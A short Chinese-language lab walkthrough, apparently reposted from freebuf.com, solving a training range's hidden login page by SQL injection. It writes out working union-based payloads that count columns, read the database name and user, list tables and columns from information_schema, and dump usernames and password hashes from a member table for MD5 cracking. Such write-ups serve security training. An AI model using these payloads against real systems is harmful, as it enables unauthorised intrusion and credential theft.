1.打开靶场,看到停机维护点进去别有洞天
2.输入单引号发现报错 输入and 1=2
3.输入 ’ and ‘1’=’1 返回正常
4.判断列数,输入 ‘ order by 5 –+ 和 ‘ order by 4 –+ 发现第一个报错,第二个正常,则说明其有4列
5.采用联合查询(union select),判断剩下其他信息
判断位置:数据库名,用户名
输入id=’ union select 1,2,3,4–+
输入:id=’ union select ‘1’,database(),user(),’4 {因为上步操作已经将位置暴露为2和3,所以我们在2和3的位置输入数据库和用户名即可 或者如下图一个一个输入也可}
id=’ union select ‘1’,’2′,database(),’4
id=’ union select ‘1’,’2′,user(),’4
猜解数据库中的表名:
‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()–+
查询数据库中的字段名:
‘ union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name=’stormgroup_member’–+
查询字段对应的值:
‘ union select 1,group_concat(name),group_concat(password),4 from stormgroup_member–+
6.进行MD5解密登录找到KEY
7.同时也可以采用sqlmap的方法
来源:freebuf.com 2021-04-09 17:15:42 by: 可乐kele
请登录后发表评论
注册